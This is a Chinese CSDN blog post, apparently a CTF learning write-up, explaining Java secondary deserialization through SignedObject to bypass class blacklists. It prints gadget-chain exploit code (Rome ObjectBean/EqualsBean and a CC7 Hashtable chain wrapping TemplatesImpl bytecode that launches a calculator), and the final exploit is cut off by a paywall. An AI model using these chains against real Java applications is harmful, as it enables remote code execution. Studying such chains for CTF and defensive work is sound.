二次反序列化 看我一命通关

最新推荐文章于 2024-04-22 11:00:59 发布
最新推荐文章于 2024-04-22 11:00:59 发布
阅读量807 收藏 2
点赞数 1
文章标签: java apache servlet
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/msbz7/article/details/126382683
版权
本文详细介绍了Java中的二次反序列化漏洞,包括其概念、应用场景和利用方式。通过实例展示了如何利用二次反序列化绕过黑名单限制,探讨了罗马(Rome)反序列化和Commons BeanUtils(CB)链的利用,并提供了相关调用栈和构造方法。此外,还讨论了WrapperConnectionPoolDataSource在特定场景下的二次反序列化利用。
摘要由CSDN通过智能技术生成

不记得是哪一场比赛了,遇到了一个 Java 的题目,过滤了很多关键类,不管小编把 CC 链如何拆开组合,都没有办法绕过。

就在此时,大佬看了一眼说,用二次反序列化就可以绕过了。“二次反序列化”这六个字重重地敲在了我的心巴上,从那以后我就对二次反序列化产生了莫名的渴望。

小编开始详细学习时,发现没有二次反序列化比较系统的学习文章,那么,就自己总结一个。

简单介绍下二次反序列化,顾名思义,就是反序列化两次,其主要意义是 绕过黑名单的限制或不出网利用

PS:本文用到的工具类会放在文末

它,是 java.security 下一个用于创建真实运行时对象的类,更具体地说, SignedObject 包含另一个 Serializable 对象。

太完美了,这个类简直是为二次反序列化而存在的,来关注下它的 getObject()

反序列化的内容也是可控

那么小编思路瞬间清晰了,先构造一个恶意 SignedObject

KeyPairGenerator kpg = KeyPairGenerator.getInstance("DSA");
kpg.initialize(1024);
KeyPair kp = kpg.generateKeyPair();
SignedObject signedObject = new SignedObject(恶意对象 用于第二次反序列化, kp.getPrivate(), Signature.getInstance("DSA"));

然后调用它的 getObject() 方法即可,那么现在压力来到了如何调用这个方法这边

提到调用 getter 方法,茯苓第一个想到的就是 rome 反序列化,众所周知,rome 的 ToStringBean 的 toString() 方法可以办到这件事,理论上是可行的,实际也是可以构造的

因为 ObjectBean 其在实例化时会实例化三个 bean,这样构造出来的内容过分长了,小编不喜欢

大家可以自行构造试试

,小编绝不是那种不负责的人,还是给出例子,但不进行具体分析

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.syndication.feed.impl.EqualsBean;
import com.sun.syndication.feed.impl.ObjectBean;
import javax.xml.transform.Templates;
import java.security.*;
import java.util.HashMap;
import static util.Tool.*;

public class R_test {
    public static void main(String[] args) throws Exception{
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][]{
                payload("mate-calc").toBytecode()});
        setFieldValue(obj, "_name", "Poria");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        HashMap hashMap1 = getpayload(Templates.class, obj);

        KeyPairGenerator kpg = KeyPairGenerator.getInstance("DSA");
        kpg.initialize(1024);
        KeyPair kp = kpg.generateKeyPair();
        SignedObject signedObject = new SignedObject(hashMap1, kp.getPrivate(), Signature.getInstance("DSA"));

        HashMap hashMap2 = getpayload(SignedObject.class, signedObject);

        run(hashMap2, "debug", "object");
    }
    public static HashMap getpayload(Class clazz, Object obj) throws Exception {
        ObjectBean objectBean = new ObjectBean(ObjectBean.class, new ObjectBean(String.class, "rand"));
        HashMap hashMap = new HashMap();
        hashMap.put(objectBean, "rand");
        ObjectBean expObjectBean = new ObjectBean(clazz, obj);
        setFieldValue(objectBean, "_equalsBean", new EqualsBean(ObjectBean.class, expObjectBean));
        return hashMap;
    }
}

rome 链的关键转折点在于 pReadMethod.invoke(_obj,NO_PARAMS) , EqualsBean 也存在这个关键代码

那么小编可以利用珍藏多年的 CC7 链,利用 Hashtable 来触发 equals

这步是 CC7 的构造方式,因为要构造两遍,所以写为静态方法。

构造恶意 TemplatesImpl ,将其装入第一个 Hashtable

构造恶意 SignedObject ,将其装入第二个 Hashtable

最终 exp

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.syndication.feed.impl.EqualsBean;
import javax.xml.transform.Templates;
import java.security.*;
import java.util.HashMap;
import java.util.Hashtable;
import static util.Tool.*;

public class R_SignedObject {
    public static void main(String[] args) throws Exception{
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][]{
                payload("mate-calc").toBytecode()});
        setFieldValue(obj, "_name", "Poria");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        Hashtable table1 = getPayload(Templates.class, obj);

        KeyPairGenerator kpg = KeyPairGenerator.getInstance("DSA");
        kpg.initialize(1024);
        KeyPair kp = kpg.generateKeyPair();
最低0.47元/天 解锁文章
欧子说Java
关注
C3P0反序列化链学习
虚幻私塾
04-21 1701
🚀 优质资源分享 🚀 学习路线指引(点击解锁) 知识定位 人群定位 🧡 Python实战微信订餐小程序 🧡 进阶级 本课程是python flask+微信小程序的完美结合,从项目搭建到腾讯云部署上线,打造一个全栈订餐系统。 💛Python量化交易实战💛 入门级 手把手带你打造一个易扩展、更安全、效率更高的量化交易系统 C3P0 c3p0第一次听闻是用于fastjson的回显上,大佬们总结三种方法,后面两种主要就是用于fastjson和jackjson的回显利用(注入内存马) http
序列二次sqp方法的全称_CVE20163510——WebLogic反序列化初探
weixin_42165973的博客
01-03 193
原理(一)概述概述链接1概述链接2接CVE-2015-4852,Oracle使用黑名单进行了防护,如下,看一下CVE-2015-4852调试过程中记录的信息,触发时的调用栈,结合上一次调试过程中记录的信息,我们可以看到,这个fix阻断了CVE-2015-4852的exp中在偏底层的位置对关键类的反序列化,可以说是打断了利用链。但同时,我们也要注意到,对那几个关键类的反序列化的禁止仅存在于...
java二进制反序列化与序列化
陕西小伙伴网络科技有限公司-技术博客
11-18 2543
1.序列化  public static byte[] SerializeObject(object obj)         {             if (obj == null)                 return null;             MemoryStream ms = new MemoryStream();             BinaryFo
# CVE-2019-2725二次反序列化EventData Gadget POC/JdbcRowSetImpl POC构造
weixin_30408739的博客
05-05 879
CVE-2019-2725二次反序列化EventData Gadget POC 构造MapMsgEntity POC时会爆如下错误,原因畅师傅已经说了,当前类不是public 具体想跟一下怎么报错的,可以这样操作,报错代码如下: java.lang.NoSuchMethodException: <unbound>=Class.new(byteArray); 全局搜索NoSu...
[Gson二]继承关系的POJO的反序列化
bit1129的博客
08-08 593
父类     package inheritance.test2; import java.util.Map; public class Model { private String field1; private String field2; private Map&lt;String, String&gt; infoMap; ...
java面试突击
qq_42882477的博客
02-23 9582
时间 版本 说明 2019-2-27 v 1.0 初版发布 2019-3-2 v 2.0 对于第一版进行了大幅度更新,除了修改了一些小错误之外,还增加了一些内容。 2019-4-18 v3.0 修复错误,完善内容,增加了少部分内容。 必看 本文档由 SnailClimb 整理,文章大部分内容来源于本人的开源项目 JavaGuide,你可以把这个文档看做JavaGuide 的精简版,适合面试前的突击...
题解 | avg(s.salary)作为字段名,要加双引号
最新发布
2301_78234743的博客
04-22 1085
发个面经,攒攒人品时间线:3.26投递--3.31笔试--4.11被捞约面--4.12一面--面完秒。面试首先是自我介绍,然后问一下项目,接着对恒生的了解,八股什么也没问,就纯聊天,大概十分钟左右[疑惑。时间线-------笔试,3.09-------ac 4.03前期:被美团优选、无人车挂------有人有消息了吗,又是漫长的等待,我已经快麻了引流,引流 #牛客帮帮团来啦!有问必答# #软件开发薪资。三面后一直在横向对比,以为凉了,周四HR约面1.自我介绍2.工作中碰到的最难的问题,如何解决的3.工。
我爱Java
yiqinianmo的博客
02-25 2882
1、 Java 基础知识 1.1 重载和重写的区别 重载: 发生在同一个类中,方法名必须相同,参数类型不同、个数不同、顺序不同,方法返回值和访问修饰符可以不同,发生在编译时。重写: 发生在父子类中,方法名、参数列表必须相同,返回值范围小于等于父类,抛出的异常范围小于等于父类,访问修饰符范围大于等于父类;如果父类方法访问修饰符为 private 则子类就不能重写该方法。 1.2 String 和 StringBuffer、StringBuilder 的区别是什么?String 为什么是不可变的? 可变
答应我,这么合适你的Java面试指南,别放在你的收藏夹吃灰了
wdjnb的博客
04-21 735
本人技术水平有限,欢迎各位指正!写得不好的话,请多见谅! 目录 前言 一 简历该如何写 1.1 为什么说简历很重要? 1.2-这3点你必须知道 1.3-两大法则了解一 1.4-项目经历怎么写? 1.5-专业技能该怎么写? 1.6-开源程序员简历模板分享 1.7 其他的一些小tips 二 计算机网络常见面试点总结 计算机网络常见问题回顾 2.1 TCP、UDP 协议的区别 2.2 在浏览器中输入url地址 ->> 显示主页的过程 2.3 各种协议与HTTP协议之间的关
[Java反序列化]—Rome反序列化
Sentiment的博客
04-28 566
ROME可能是目前最完善的开源聚合工具,ROME支持绝大多数的RSS协议。
JAVA中的序列化与反序列化
2301_76967212的博客
06-11 344
把内存中的Java对象转换成与平台无关的二进制字节序列(在保存数据时,保存数据的值和数据类型)。
C3P0 反序列化
01-26 656
C3P0 反序列化 依赖 <dependency> <groupId>com.mchange</groupId> <artifactId>c3p0</artifactId> <version>0.9.5.2</version> </dependency> Gadget /* * Gadget: * PoolBackedDataSourceBase#readObject *
java序列化和反序列化(jackson)
m0_74790475的博客
04-23 681
如何对json进行序列化和反序列化。以及spring的一些注解的使用
java序列化与反序列化详解_java序列化和反序列化,不吃透都对不起自己
2401_84166536的博客
04-09 963
serialVersionUID - 0x0e 76 fa 9f 59 73 be c6 是16进制转换为二进制,就是生成的值在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。
[Java安全]C3P0反序列化不出网利用学习
Y4tacker的博客
10-13 1329
文章目录参考文章利用链构造利用链分析 参考文章 本文复现了雨了个雨师傅的文章,思路很好,看完以后其实和JNDI8u191后的绕过思路一致,这个等下再复现学习 利用链构造 在昨天看了Ysoserial的基本过程以后其实这个就相对简单了,不一样的地方就是后面Ysoserial用了URLClassLoader,而这个是当前线程下的ClassLoader,曾经一直觉得没用,还是自己学的太少了,大佬想到通过Tomcat的getObjectInstance方法调用ELProcessor的eval方法实现表达式注入 p
Javaweb安全——反序列化漏洞-C3P0链
weixin_43610673的博客
10-25 2196
C3P0是一个开源的JDBC连接池,它实现了数据源与JNDI绑定,支持JDBC3规范和实现了JDBC2的标准扩展说明的Connection和Statement池的DataSources对象。即将用于连接数据库的连接整合在一起形成一个随取随用的数据库连接池(Connection pool)。..............自下向上的调用,从lookup看着像一个jndi注入,调用链比较短,直接静态审计源码试试。还原属性赋值跟到的内部类的方法。
java反序列化漏洞在CTF中的利用
m0_64893612的博客
03-01 1170
序列化指的是将对象或数据结构转换为可存储或传输的格式的过程,实现的方法是;反序列化则反之,实现的方法是,可以简单地理解为将文件压缩和解压缩的过程。与PHP中反序列互相触发魔法函数导致的漏洞成因不同,java反序列化漏洞的成因主要是由于java序列化和反序列化机制的设计特点所致,简单地讲,只要反序列化代码中含有危险的命令代码,且该代码的参数是可控的,那它就存在该漏洞。漏洞原理在我今天这里不是重要的,我主要想记录的是该漏洞的利用方式。通常在解题中如果你看到一段字符串以rO0AB。
面试系列 - 序列化和反序列化详解
境里婆娑
09-08 229
Java 序列化是一种将对象转换为字节流的过程,可以将对象的状态保存到磁盘文件或通过网络传输。反序列化则是将字节流重新转换为对象的过程。Java 提供了一个强大的序列化框架,允许你在对象的持久化和网络通信中使用它
前端传的list不能遍历 报错 Error: java.util.LinkedHashMap cannot be cast to 三种方式进行二次序列化
黄嚯嚯
07-24 1280
在经过一番问题查找后, 由于公司封装了一层框架 , 然后框架在进行前后端参数交互时候, 针对参数进行了统一序列化 , 也就是说如果不在平台上进行配置的话 , 公司框架是无法识别出来类型的 , 在无法识别类型的情况下进行的序列化后代码是无法准确地被反序列化的 ,但又懒得去添加,,,,索性在代码里针对接受过来的参数进行了二次手动序列化 , 这里我一共尝试了 三种 ,具体使用根据自己代码选择 ,
Django框架序列化与反序列化实战解析
对于批量操作,比如查询所有`BookInfo`书籍,可以先获取所有书籍的查询集,然后创建序列化器并将这些数据传递给序列化器,这样就能一次性将所有书籍转换为JSON格式的列表。 此外,序列化器还支持`context`参数,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值